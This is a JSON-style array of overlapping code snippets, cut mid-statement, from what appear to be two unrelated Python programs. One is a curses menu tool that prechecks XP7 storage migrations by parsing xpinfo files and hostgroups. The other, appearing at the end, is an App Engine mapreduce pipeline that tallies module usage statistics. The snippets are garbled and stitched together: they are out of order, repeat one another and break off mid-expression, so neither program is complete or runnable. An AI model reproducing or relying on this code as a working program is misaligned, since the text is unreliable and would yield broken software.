"name,value in cfg.items(\"serialnbr\"): serialnbr_dict[name.upper()] = int(value) for name,value in cfg.items(\"instance\"): instance_dict[name.upper()] = int(value)",
"cfg.items(\"instance\"): instance_dict[name.upper()] = int(value) for name,value in cfg.items(\"site\"): site_dict[name.upper()] = value for name,value",
"xpinfo_file_reader: if len(row) > 8: hostname = row[0] device_name = row[1] ldev_nbr =",
"### slide slice up ### self.slice_start += n if self.slice_start < 0: self.slice_start",
"= curses.A_STANDOUT else: mode = curses.A_NORMAL line = \"{}\".format(item) if len(line) >= self.width:",
"SEARCH string\",search.clear)) ### select hostgroups by box ### for boxpair_name in sorted(boxpair_dict.keys()): select_item_dict",
"elif key == curses.KEY_DOWN: self.navigate(1) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class InputMenu(object): def __init__(self,window,text,upd_obj,stdscr):",
"### stdscr.clear() ### check window heigth and width ### if curses.COLS < 20",
"in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for hostgroup_name in hostgroup_name_list: if hostgroup_name not in",
"curses.doupdate() def add(self,item): current_set = set(self.consistent) current_set.add(item) self.consistent = list(sorted(current_set)) self.display() def clear(self):",
"is a view on the items which fits in the window ### self.slice_start",
"### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in xpinfo_file_reader: if",
"file processing CONFIG : xpmig.ini LOG : xpmig_precheck.log TODO : add generate temporary",
"ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO: known S/N, added to ldev_dict, now at {} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO:",
"== len(self.filtered_items) - 1: break else: # self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for",
"self.slice_start + self.slice_len self.position = 0 def navigate(self,n): self.position += n if self.position",
"slice down ### self.slice_end += n if self.slice_end > len(self.xpinfo_file_list) - 1: self.slice_end",
"self.position = 0 elif self.position >= len(self.filtered_items): self.position = len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate",
"elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr):",
"def __init__(self,window,consistent,map_dir,stdscr): self.window = window self.consistent = consistent self.map_dir = map_dir self.window.keypad(1) self.panel",
"self.position >= len(self.filtered_items): self.position = len(self.filtered_items) - 1 logger.debug(\"Select_Menu.navigate :: position = {},",
"know what to display ### self.slice_start = 0 self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end =",
"- 1: self.slice_end = len(self.display_list) - 1 self.slice_start = self.slice_end - self.slice_len def",
"DOWN <B> BACK\",curses.A_BOLD) ### define menu_win ### menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items",
"= logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s %(levelname)s %(message)s\",\"%Y/%m/%d-%H:%M:%S\") fh.setFormatter(formatter) logger.addHandler(fh)",
"S/N {} LDEV {} from xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr in ldev_dict: ldev_dict[serial_nbr].add(ldev_nbr) logger.debug(\"XPINFO:",
"#################################################################################################### #################################################################################################### ### CLASSES #################################################################################################### class Menu(object): def __init__(self,window,items,stdscr): self.window = window self.heigth,self.width",
"line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set = set(self.selection) current_set.add(item)",
"CA check ### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to",
"string\",input_search.display)) main_menu_items.append((\"Clear SEARCH string\",search.clear)) ### select hostgroups by box ### for boxpair_name in",
"else: logger.debug(\"{}-{} does not exists\".format(box_name,hostgroup_name)) ### now we know what to display ###",
"self.consistent = list(sorted(current_set)) self.display() def clear(self): del self.consistent[:] self.display() def get(self): return self.consistent",
"config file {}, exiting..\".format(mandatory_section,configfile)) sys.exit(1) for name,value in cfg.items(\"boxpair\"): boxpair_dict[name.upper()] = value.split(\",\") for",
"self.display_list = [] for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we know what",
"self.window.clear() line = \"{}: \".format(self.text) if line >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line)",
"selection self.hostgroup_summary = [] self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = []",
"{} for boxpair_name in sorted(boxpair_dict.keys()): for box_name in boxpair_dict[boxpair_name]: hostgroup_name_list = box_dict[box_name].get_hostgroups() for",
"framework 1.0 Initial version 1.1 Curses menu structure added 1.2 Add search term",
"select_item_dict: select_item_dict[\"{}-{}\".format(box_name,sel_item)] = set() select_item_dict[\"{}-{}\".format(box_name,sel_item)].add((box_name,hostgroup_name)) hg_by_host_menu = Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select",
"logger.debug(\"SelectMenu.display :: about to addstr line {}\".format(line)) if self.slice_start <= index <= self.slice_end:",
"[] for box_name,hostgroup_name in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we know what to display",
"line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def set(self,search_str): self.search_str = search_str self.display()",
"self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text = text self.reply",
"### CLASSES #################################################################################################### class Menu(object): def __init__(self,window,items,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx()",
"1: ### slide slice down ### self.slice_end += n if self.slice_end > len(self.filtered_items)",
"### define consistent_win ### consistent_win = stdscr.subwin(3,curses.COLS,curses.LINES-4,0) consistent = Consistent(consistent_win,\"CONSISTENT HOSTGROUP(s)\",stdscr) consistent.display() ###",
"self.position < 0: self.position = 0 elif self.position >= len(self.filtered_items): self.position = len(self.filtered_items)",
"search criteria \"\"\" if self.search.get() != \"\": logger.debug(\"Select_Menu.update :: update items to match",
"Search(object): def __init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.search_str",
"Select_Menu(menu_win,select_item_dict,selection,search,stdscr) main_menu_items.append((\"Select by HOSTNAME\",hg_by_host_menu.display)) ### select hostgroups by name ### select_item_dict = {}",
"self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: if self.position == len(self.items) - 1: break else:",
"### define selection_win ### select_win = stdscr.subwin(3,curses.COLS,curses.LINES-7,0) selection = Selection(select_win,\"SELECTED HOSTGROUP(s)\",stdscr) selection.display() ###",
"menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items = [] input_search = InputMenu(menu_win,\"Specify new search",
"self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.text",
"self.position = 0 def navigate(self,n): self.position += n if self.position < 0: self.position",
"self.hostgroup_summary = [] self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] def",
"box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_Menu(object): def __init__(self,window,items,selection,search,stdscr): self.window",
"for name,value in cfg.items(\"instance\"): instance_dict[name.upper()] = int(value) for name,value in cfg.items(\"site\"): site_dict[name.upper()] =",
"### menu_win = stdscr.subwin(curses.LINES-13,curses.COLS,3,0) # menu_win.border() main_menu_items = [] input_search = InputMenu(menu_win,\"Specify new",
"self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL # line = \"{}: {}\".format(index,item[0])",
"processing CONFIG : xpmig.ini LOG : xpmig_precheck.log TODO : add generate temporary horcm",
"self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name))",
"1.0 Initial version 1.1 Curses menu structure added 1.2 Add search term criteria",
"self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif key ==",
"at {} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line too short to be valid, skipping {}\".format(row))",
"self.slice_end = self.slice_start + self.slice_len self.position = 0 def navigate(self,n): self.position += n",
"select hostgroups by name ### select_item_dict = {} for boxpair_name in sorted(boxpair_dict.keys()): for",
"curses.A_NORMAL # line = \"{}: {}\".format(index,item) line = \"{}\".format(item) if len(line) >= self.width:",
"1: break else: self.items[self.position][1]() elif key == curses.KEY_UP: self.navigate(-1) elif key == curses.KEY_DOWN:",
"string\",search.clear)) ### select hostgroups by box ### for boxpair_name in sorted(boxpair_dict.keys()): select_item_dict =",
"self.slice_start = 0 self.slice_len = min(len(self.display_list),self.heigth-6) self.slice_end = self.slice_start + self.slice_len while True:",
"self.window = window self.heigth,self.width = self.window.getmaxyx() ### items is a dict ### self.items",
"curses.doupdate() for index,item in enumerate(self.filtered_items): if index == self.position: mode = curses.A_STANDOUT else:",
"not defined, exiting..\\n\") sys.exit(1) try: collect_dir = cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file dir not",
"elif key == curses.KEY_NPAGE: self.navigate(10) self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() #################################################################################################### ### MAIN ####################################################################################################",
"serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name ##################### ### start logging ### ##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\")",
"#################################################################################################### ### FUNCTIONS #################################################################################################### #################################################################################################### ### CLASSES #################################################################################################### class Menu(object): def __init__(self,window,items,stdscr): self.window",
"else: logger.debug(\"Select_Menu.update :: update items to match search all\") self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\")",
"logger.debug(\"XPINFO: got S/N {} LDEV {} from xpinfo file\".format(serial_nbr,ldev_nbr)) if serial_nbr in ldev_dict:",
"main_menu_items.append((\"Set SEARCH string\",input_search.display)) main_menu_items.append((\"Clear SEARCH string\",search.clear)) ### select hostgroups by box ### for",
"import copy from ConfigParser import ConfigParser import sys import os import os.path import",
"for box_name,serial_nbr in serialnbr_dict.items(): serial_to_name_dict[serial_nbr] = box_name ##################### ### start logging ### #####################",
"list of xpinfo files ### for index,item in enumerate(self.xpinfo_file_list): if index == self.position:",
"logger.info(\"{}-{} added to consistent hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added",
"panel.update_panels() curses.doupdate() class ShowWriteProvisionMenu(object): def __init__(self,window,consistent,map_dir,stdscr): self.window = window self.consistent = consistent self.map_dir",
"= os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh = logging.handlers.RotatingFileHandler(logfile,maxBytes=log_size,backupCount=log_versions) formatter = logging.Formatter(\"%(asctime)s %(levelname)s",
"xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in xpinfo_file_reader: if len(row) > 8: hostname =",
"self.slice_start >= 1: self.slice_start += n if self.slice_start < 0: self.slice_start = 0",
"self.selection = selection self.search = search def update(self): \"\"\" update the selection items",
"file dir not defined, exiting..\\n\") sys.exit(1) serial_to_name_dict = {} for box_name,serial_nbr in serialnbr_dict.items():",
"= set(self.selection) current_set.add(item) self.selection = list(sorted(current_set)) self.display() def clear(self): del self.selection[:] self.display() def",
"= self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif key == curses.KEY_UP: self.navigate(-1) elif",
"previous ODR framework 1.0 Initial version 1.1 Curses menu structure added 1.2 Add",
"return self.consistent class ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.selection",
"and re.match(\".+\\.xpinfo$\",f,flags=re.IGNORECASE)] self.xpinfo_file_list.append(\"exit\") self.slice_len = min(len(self.xpinfo_file_list)-1, self.heigth - 6) self.slice_start = 0 self.slice_end",
"cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file dir not defined, exiting..\\n\") sys.exit(1) try: map_dir = cfg.get(\"dir\",\"map\")",
"in the slice ### # logger.debug(\"SelectMenu.display :: about to addstr line {}\".format(line)) if",
"logger.info(\"#\" * linelen) logger.info(\"XPMIG PRECHECK started\") logger.info(\"#\" * linelen) logger.info(\"Configuration settings :\") logger.info(\"BOXPAIR",
"class ShowSummaryMenu(object): def __init__(self,window,selection,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.selection = selection",
"__init__(self,window,title,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.title = title self.selection = []",
"### check window heigth and width ### if curses.COLS < 20 or curses.LINES",
"open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else: self.window.addstr(2,2,\"Cancelled..\") self.window.clear() self.panel.hide() panel.update_panels() curses.doupdate() class Select_Menu(object):",
"< 0: self.position = 0 elif self.position >= len(self.filtered_items): self.position = len(self.filtered_items) -",
"hostgroup list during consistency check\".format(box_name,hostgroup_name)) else: logger.error(\"{}-{} not added to consistent hostgroup list",
"for box_name,hostgroup_name in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add CA check ### result,report",
"self.slice_start = self.slice_end - self.slice_len def display(self): self.panel.top() self.panel.show() self.window.clear() self.update() while True:",
"if self.slice_end < len(self.display_list) - 1: self.slice_end += n if self.slice_end > len(self.display_list)",
"a dict ### self.items = items self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") ### slice is",
"min(len(self.filtered_items)-1,self.heigth-6) self.slice_end = self.slice_start + self.slice_len self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position",
"self.slice_end - self.position < 2 and self.slice_end < len(self.filtered_items) - 1: ### slide",
"self.position = 0 self.selection = selection self.search = search def update(self): \"\"\" update",
"0 elif self.position >= len(self.xpinfo_file_list): self.position = len(self.xpinfo_file_list) - 1 if n <",
"self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def set(self,search_str): self.search_str = search_str",
"\"xpmig.ini\" cfg = ConfigParser() cfg.read(configfile) for mandatory_section in (\"boxpair\",\"serialnbr\",\"instance\",\"site\",\"collect\",\"dir\"): if not cfg.has_section(mandatory_section): sys.stderr(\"{}",
"= [] for box_name,hostgroup_name in self.selection.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): ### TODO: add CA check",
"self.slice_start = 0 self.slice_len = 0 self.slice_end = 0 self.window.keypad(1) self.panel = panel.new_panel(self.window)",
": Based on previous ODR framework 1.0 Initial version 1.1 Curses menu structure",
"adjust slice ### if n < 0: if self.position - self.slice_start < 2",
"box {} :\".format(box_name)) logger.info(box_dict[box_name]) ##################### ### start menu ### ##################### curses.wrapper(main) logger.info(\"#\" *",
"HOSTGROUP(s)\",stdscr) consistent.display() ### define key_win ### key_win = stdscr.subwin(1,curses.COLS,curses.LINES-1,0) #key_win.clear() #key_win.refresh() #curses.doupdate() key_win.addstr(0,2,\"<ARROW-UP",
"ldev_dict, now at {} elements\".format(len(ldev_dict[serial_nbr]))) else: logger.error(\"XPINFO: line too short to be valid,",
"elif key == curses.KEY_DOWN: self.navigate(1) elif key == curses.KEY_PPAGE: self.navigate(-10) elif key ==",
"serial_nbr_set: ldev_dict[serial_nbr] = set() ### process the selected xpinfo file ### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\")",
"self.position == len(self.filtered_items) - 1: break else: # self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]])",
"index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL # line =",
"self.slice_end = self.slice_start + self.slice_len self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position =",
"if index == self.position: mode = curses.A_STANDOUT else: mode = curses.A_NORMAL line =",
"logger.info(\"XP7 object created for box {} :\".format(box_name)) logger.info(box_dict[box_name]) ##################### ### start menu ###",
"box_dict[box_name] = xp7.XP7(box_name,instance_nbr,serial_nbr,site,collect_file) logger.info(\"XP7 object created for box {} :\".format(box_name)) logger.info(box_dict[box_name]) ##################### ###",
"logger.debug(\"Select_Menu.navigate :: slide slice down to {}-{}\".format(self.slice_start,self.slice_end )) def display(self): self.panel.top() self.panel.show() self.window.clear()",
"if n < 0: if self.position - self.slice_start < 2 and self.slice_start >=",
"box_dict[box_name].get_hostgroup_hba_wwns(hostgroup_name) for hba_wwn in hba_wwn_list: if len(hba_wwn.nickname.split(\"_\")) > 1: sel_item = hba_wwn.nickname.split(\"_\")[0] else:",
"= self.slice_start + self.slice_len elif n > 0: if self.slice_end < len(self.display_list) -",
"self.window.refresh() curses.doupdate() for index,item in enumerate(self.filtered_items): if index == self.position: mode = curses.A_STANDOUT",
"else: # self.items = {\"select_str\":[(boxpair_name,hostgroup_name),...]} # self.selection.add(self.items[self.filtered_items[self.position]]) for add_item in self.items[self.filtered_items[self.position]]: self.selection.add(add_item) elif",
"hostgroup_dict: for hostgroup_name in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name))",
"logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict) logger.info(\"XPINFO dir: {}\".format(xpinfo_dir)) ######################### ### instantiate boxes",
"match search all\") self.filtered_items = copy.copy(self.items.keys()) self.filtered_items.append(\"exit\") self.slice_start = 0 self.slice_end = self.slice_start",
"import logging.handlers import copy from ConfigParser import ConfigParser import sys import os import",
"#################################################################################################### class Menu(object): def __init__(self,window,items,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1) self.panel",
"= consistent def navigate(self,n): if n < 0: if self.slice_start >= 1: self.slice_start",
"start logging ### ##################### logfile = os.path.join(log_dir,\"xpmig_precheck.log\") logger = logging.getLogger(\"xpmig_precheck\") logger.setLevel(log_level) fh =",
"if self.slice_start < 0: self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len logger.debug(\"Select_Menu.navigate",
"in self.selection.get(): self.display_list.extend(box_dict[box_name].get_hostgroup_noluns(hostgroup_name)) ### now we know what to display ### self.slice_start =",
"to pairdisplay & check on status #################################################################################################### \"\"\" import curses from curses import",
"len(line) >= self.width: line = line[:self.width-1] self.window.addstr(1,2,line) self.window.border() self.window.refresh() curses.doupdate() def add(self,item): current_set",
"{} :\".format(box_name)) logger.info(box_dict[box_name]) ##################### ### start menu ### ##################### curses.wrapper(main) logger.info(\"#\" * linelen)",
"curses.LINES < 20: sys.stderr.write(\"Window not large enough, exiting ..\\n\") sys.exit(1) ### define title_win",
"list(sorted(current_set)) self.display() def clear(self): del self.consistent[:] self.display() def get(self): return self.consistent class ShowSummaryMenu(object):",
"which fits in the window ### self.slice_start = 0 self.slice_len = min(len(self.filtered_items)-1,self.heigth-6) self.slice_end",
"self.xpinfo_file_list =[] self.slice_start = 0 self.slice_len = 0 self.slice_end = 0 self.window.keypad(1) self.panel",
"len(self.items) - 1 def display(self): self.panel.top() self.panel.show() self.window.clear() while True: self.window.refresh() curses.doupdate() for",
"up to {}-{}\".format(self.slice_start,self.slice_end )) elif n > 0: if self.slice_end - self.position <",
"for serial_nbr in serial_nbr_set: ldev_dict[serial_nbr] = set() ### process the selected xpinfo file",
"<= self.slice_end: self.window.addstr(1+(index-self.slice_start),2,item,curses.A_NORMAL) key = self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"B\"),ord(\"b\")]: break elif key",
"xpinfo files present \"\"\" if os.path.exists(self.xpinfo_dir): del(self.xpinfo_file_list[:]) self.xpinfo_file_list = [f for f in",
"exiting..\\n\") sys.exit(1) try: collect_dir = cfg.get(\"dir\",\"collect\") except: sys.stderr.write(\"collect file dir not defined, exiting..\\n\")",
"in hostgroup_dict[box_name]: logger.debug(\"XPINFO processing: adding {}-{} to the selection\".format(box_name,hostgroup_name)) self.selection.add((box_name,hostgroup_name)) elif key ==",
"= 0 self.slice_end = 0 self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.position =",
"= self.window.getch() if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out the ldevs to file",
"check ### result,report = box_dict[box_name].get_hostgroup_consistency(hostgroup_name) self.display_list.extend(report) if result: self.consistent.add((box_name,hostgroup_name)) logger.info(\"{}-{} added to consistent",
"if key in [curses.KEY_ENTER,ord(\"\\n\"),ord(\"Y\"),ord(\"y\")]: ### write out the ldevs to file ### for",
"self.selection[:] self.display() def get(self): return self.selection class Search(object): def __init__(self,window,title,stdscr): self.window = window",
": xpmig_precheck.log TODO : add generate temporary horcm file and daemon to pairdisplay",
"sys.stderr.write(\"Window not large enough, exiting ..\\n\") sys.exit(1) ### define title_win ### title_win =",
"= min(len(self.xpinfo_file_list)-1, self.heigth - 6) self.slice_start = 0 self.slice_end = self.slice_start + self.slice_len",
"MIGRATION PRE-CHECK\") title_win.border() ### define search_win ### search_win = stdscr.subwin(3,curses.COLS,curses.LINES-10,0) search = Search(search_win,\"Display",
"hostgroup ### for serial_nbr in ldev_dict: box_name = serial_to_name_dict[serial_nbr] if not box_name in",
"CLASSES #################################################################################################### class Menu(object): def __init__(self,window,items,stdscr): self.window = window self.heigth,self.width = self.window.getmaxyx() self.window.keypad(1)",
"window heigth and width ### if curses.COLS < 20 or curses.LINES < 20:",
"key == curses.KEY_DOWN: self.navigate(1) elif key == curses.KEY_PPAGE: self.navigate(-10) elif key == curses.KEY_NPAGE:",
"logger.info(boxpair_dict) logger.info(\"SERIAL NBRs:\") logger.info(serialnbr_dict) logger.info(\"INSTANCE NBRs:\") logger.info(instance_dict) logger.info(\"SITE NBRs:\") logger.info(site_dict) logger.info(\"COLLECT FILEs:\") logger.info(collectfile_dict)",
"xpinfo file ### with open(\"{}/{}\".format(self.xpinfo_dir,self.xpinfo_file_list[self.position]),\"rt\") as f: xpinfo_file_reader = csv.reader(f,delimiter=\",\",quotechar=\"'\") for row in",
"== len(self.xpinfo_file_list) - 1: break else: logger.debug(\"XPINFO: start processing {}\".format(self.xpinfo_file_list[self.position])) serial_nbr_set = set(serialnbr_dict.values())",
"[] self.window.keypad(1) self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] def navigate(self,n): if",
"= self.slice_start + self.slice_len elif n > 0: if self.slice_end - self.position <",
"curses.A_NORMAL line = \"{}\".format(item) if len(line) >= self.width: line = line[:self.width-1] ### only",
"self.consistent.get(): if box_dict[box_name].test_hostgroup_exists(hostgroup_name): sf = os.path.join(self.map_dir,\"{}_{}.prov\".format(box_name,hostgroup_name)) with open(sf,\"wt\") as sfh: box_dict[box_name].print_provisioning(hostgroup_name,sfh) self.window.addstr(2,2,\"Written..\") else:",
"self.panel = panel.new_panel(self.window) self.panel.hide() panel.update_panels() self.display_list = [] self.consistent = consistent def navigate(self,n):",
"0 self.selection = selection self.search = search def update(self): \"\"\" update the selection"
] |
[
"KIND, either express or implied. # See the License for the specific language",
"Unless required by applicable law or agreed to in writing, software # distributed",
"_combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner %s combined: %s', key, combined) yield combined def",
"combined}) if DEBUG: logging.debug('reducer %s: %s', app_id, json_line) yield '%s\\n' % json_line class",
"'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec': 'solutions.common.job.module_statistics.combiner',",
"2020 Green Valley Belgium NV # # Licensed under the Apache License, Version",
"10 } output = yield mapreduce_pipeline.MapreducePipeline(key, **params) process_output_pipeline = yield ProcessOutputPipeline(output, current_date) with",
"import logging import time import cloudstorage from mapreduce import mapreduce_pipeline from pipeline import",
"module, count in stats.iteritems(): if module not in combined: combined[module] = count else:",
"%s', redirect_url) return get_server_settings().baseUrl + redirect_url def mapper(sln_settings): # type: (SolutionSettings) -> GeneratorType",
"this file except in compliance with the License. # You may obtain a",
"of dicts with key app_id, value dict of module, amount outputs = self.outputs.default.value",
"timestamp = self.args # list of dicts with key app_id, value dict of",
"from rogerthat.utils import guid, log_offload def start_job(): current_date = datetime.datetime.now() key = 'module_stats_%s_%s'",
"previously_combined_values: %s', key, previously_combined_values) combined = _combine(new_values, previously_combined_values) if DEBUG: logging.debug('combiner %s combined:",
"output, None, timestamp=timestamp) class ProcessFilePipeline(pipeline.Pipeline): def run(self, filename): stats_per_app = {} with cloudstorage.open(filename,",
"ANY KIND, either express or implied. # See the License for the specific",
"import pipeline from pipeline.common import List from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from",
"logging.debug('combiner %s combined: %s', key, combined) yield combined def reducer(app_id, values): # type:",
"(str, list[list[str]], list[dict[str, int]]) -> GeneratorType if DEBUG: logging.debug('combiner %s new_values: %s', key,",
"type: (list[list[str]], list[dict[str, int]]) -> dict[str, int] combined = {} for stats in",
"logging.info('reducer values: %s', values) combined = _combine([], values) json_line = json.dumps({'app_id': app_id, 'stats':",
"redirect_url def mapper(sln_settings): # type: (SolutionSettings) -> GeneratorType for service_identity in get_service_identities(sln_settings.service_user): yield",
"{ 'mapper_spec': 'solutions.common.job.module_statistics.mapper', 'mapper_params': { 'bucket_name': bucket_name, 'entity_kind': 'solutions.common.models.SolutionSettings', 'filters': [] }, 'combiner_spec':",
"WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See",
"logging.info('ModuleStats pipeline url: %s', redirect_url) return get_server_settings().baseUrl + redirect_url def mapper(sln_settings): # type:",
"List(*results) def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value = %s', self.outputs.default.value) _, timestamp =",
"d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline): def run(self, output):",
"url: %s', redirect_url) return get_server_settings().baseUrl + redirect_url def mapper(sln_settings): # type: (SolutionSettings) ->",
"IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or",
"return get_server_settings().baseUrl + redirect_url def mapper(sln_settings): # type: (SolutionSettings) -> GeneratorType for service_identity",
"type: (str, list[dict[str, int]]) -> GeneratorType if DEBUG: logging.info('reducer values: %s', values) combined",
"License. # # @@license_version:1.7@@ import datetime import json import logging import time import",
"# list of dicts with key app_id, value dict of module, amount outputs",
"def finalized(self): if self.was_aborted: logging.error('%s was aborted', self, _suppress=False) return logging.info('%s was finished',",
"+= 1 return combined def combiner(key, new_values, previously_combined_values): # type: (str, list[list[str]], list[dict[str,",
"import get_server_settings from rogerthat.utils import guid, log_offload def start_job(): current_date = datetime.datetime.now() key",
"import time import cloudstorage from mapreduce import mapreduce_pipeline from pipeline import pipeline from",
"in stats.iteritems(): if module not in combined: combined[module] = count else: combined[module] +=",
"OF ANY KIND, either express or implied. # See the License for the",
"CleanupGoogleCloudStorageFiles(output) def finalized(self): if self.was_aborted: logging.error('%s was aborted', self, _suppress=False) return logging.info('%s was",
"utf-8 -*- # Copyright 2020 Green Valley Belgium NV # # Licensed under",
"eval(v) if isinstance(v, basestring) else v for module in modules: if module not",
"json_line) yield '%s\\n' % json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key, current_date): #",
"**params) process_output_pipeline = yield ProcessOutputPipeline(output, current_date) with pipeline.After(process_output_pipeline): yield CleanupGoogleCloudStorageFiles(output) def finalized(self): if",
"in output: results.append((yield ProcessFilePipeline(filename))) yield List(*results) def finalized(self): if DEBUG: logging.debug('ProcessOutputPipeline: self.outputs.default.value =",
"import List from rogerthat.consts import STATS_QUEUE, DEBUG, PIPELINE_BUCKET from rogerthat.dal.service import get_service_identities from",
"-> GeneratorType if DEBUG: logging.debug('combiner %s new_values: %s', key, new_values) logging.debug('combiner %s previously_combined_values:",
"# type: (str, list[dict[str, int]]) -> GeneratorType if DEBUG: logging.info('reducer values: %s', values)",
"value dict of module, amount outputs = self.outputs.default.value # type: list[dict[int, int]] for",
"class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key, current_date): # type: (str, str, long) ->",
"% json_line class ModuleStatsPipeline(pipeline.Pipeline): def run(self, bucket_name, key, current_date): # type: (str, str,",
"# type: (list[list[str]], list[dict[str, int]]) -> dict[str, int] combined = {} for stats",
"stats_per_app[d['app_id']] = d['stats'] if DEBUG: logging.debug('ProcessFilePipeline: %s', stats_per_app) return stats_per_app class CleanupGoogleCloudStorageFiles(pipeline.Pipeline): def",
"else v for module in modules: if module not in combined: combined[module] =",
